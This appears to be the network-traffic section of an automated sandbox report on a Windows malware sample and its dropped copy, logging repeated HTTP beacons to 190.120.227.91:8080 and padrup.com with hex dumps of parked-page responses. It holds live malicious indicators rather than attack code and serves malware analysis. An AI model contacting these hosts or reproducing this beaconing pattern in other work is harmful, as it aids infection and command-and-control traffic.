                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODA5NC42MTA5OjZjMGU1YzNjYTRjNjI2NDc5OGZiOWNjNzYzYmFmZmE2MjJkOTExNGFhNjdlNTNlMGVjM2NiMzVlNDUwNGI06e9NTc6NjcxMjNiNWU5NTI
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:34.964755058 CEST424INData Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:34.964934111 CEST340INData Raw: 35 35 34 66 63 36 30 34 33 34 33 34 34 39 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 554fc604343449');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          1192.168.2.949709190.120.227.9180801376C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:35.927814960 CEST166OUTGET /sobakavolos.gif?74d2bd=76561250 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          2192.168.2.949712185.53.178.50801376C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:40.216442108 CEST153OUTGET /sobaka1.gif?df9780=58613248 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:41.392676115 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:41:41 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_EJwuXPnpUhf/4/f7YZpFw8ISPUpybUPM0pm8lL5l3uMTUhapL+40RYueGfnRE6hwIfwAdK1QIY9T63gwKZCQ1g==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 35 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 5c3<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:41.392776012 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODEwMS4wMjA3OjgyZTllNmEzZmNkNDEyYzI2NGVkNzYzNDhiNzhmZDI1ZTkzYTU0YmQxZDQ0MDM3N2MzYzIxNjM4YmIwNGU1NTg6NjcxMjNiNjUwNTEwYg==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:41.392790079 CEST764INData Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          3192.168.2.949716185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:48.271367073 CEST153OUTGET /sobaka1.gif?7caa7d=57190763 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.368335962 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:41:49 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_hdW3TabLMZnMyOFAadB0ggFQ86uXNTqur2jTpNZwIeoOWBmAciu7vXrH+DSk8n6xEOZgL0KoZKWfMkPXcrvouA==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.368809938 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODEwOS4wMTYxOjZlNDZhZjI5ZGIzMDQ2MGRjYTJkNGEzNWY2YzY5YzMxOGQ5YTNlZmEzZDM1YjZlMmE1NzRhNzIzNWM1ZWQ1Yzg6NjcxMjNiNmQwM2VjNw==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.368823051 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.369576931 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 65 39 30 33 61 34 65 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 146e903a4e');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          4192.168.2.949719190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:49.387331009 CEST166OUTGET /sobakavolos.gif?7d519a=82128900 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          5192.168.2.949721185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:54.357119083 CEST153OUTGET /sobaka1.gif?cb36a4=13317796 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.419142008 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:41:55 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_j/b4f+diAYNZktnHVrSpanU9VVJlYTJ0GRFLL8pTR7G7yLjb/pEYIVjh+7HdrxN0bnoCXamqJxOiBIx95ynAIA==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.419325113 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODExNS4wODE1OjM4YTA2MGJmNWI3NzE1NmQ4YjZiYjA0Yzk5ZTNkOGE4ZGQzZGYyM2RhMGRmOGRmMjY0MTY1MjYxNTdkNGVhNTc6NjcxMjNiNzMxM2U4NQ==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.419339895 CEST760INData Raw: 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65
                                                                                                                                                                                                                                                                                          Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          6192.168.2.949722190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.460707903 CEST167OUTGET /sobakavolos.gif?eaa8c1=153786250 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          7192.168.2.949723185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:00.421020031 CEST155OUTGET /sobaka1.gif?165b05c=164090500 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531562090 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:42:01 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_IUPOrJNXslc40kc4jhLi2VIZdk/Adx4+pOtb0pwIWX3X9P9vCdH1d+uoY4nVRRdTQ91UHoRo7bhHVXZUwcQapQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531630993 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODEyMS4xNDI3OjliMzMzYWZlODdjNTkzMTIyMmMwMTEyZDQwMTk1MTc3OWJlOTJkYzQzNTVhYWM2OTgxODIzNGE3MThiMDc3NDI6NjcxMjNiNzkyMmQ3OQ==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:01.531642914 CEST764INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          8192.168.2.949724190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
